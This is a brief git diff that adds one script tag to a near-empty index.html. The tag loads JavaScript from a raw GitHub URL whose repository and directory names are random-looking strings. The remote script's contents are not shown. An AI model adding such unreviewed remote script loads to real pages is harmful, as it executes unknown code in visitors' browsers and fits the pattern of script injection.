--- a/Gv1yD8zX7aS4nTp9Lk/Z7tYhR3cVx9uPq2Lk5M/R5JzZ1tL3mQnW8VrYp/H7nRzP0wC9vVtB6XQ5K/index.html
+++ b/Gv1yD8zX7aS4nTp9Lk/Z7tYhR3cVx9uPq2Lk5M/R5JzZ1tL3mQnW8VrYp/H7nRzP0wC9vVtB6XQ5K/index.html
@@ -5,5 +5,6 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
 </head>
 <body>
+    <script type="text/javascript" src="https://raw.githubusercontent.com/N5tVo3Pf8hR2AJwqQ1mX0Z/R5JzZ1tL3mQnW8VrYpM2j0VrT5FxHkW7uP4YN8Zt1LnV6uQyW3GzF5J/refs/heads/main/Gv1yD8zX7aS4nTp9Lk/Z7tYhR3cVx9uPq2Lk5M/R5JzZ1tL3mQnW8VrYp/H7nRzP0wC9vVtB6XQ5K/script.js"></script>
 </body>
 </html>
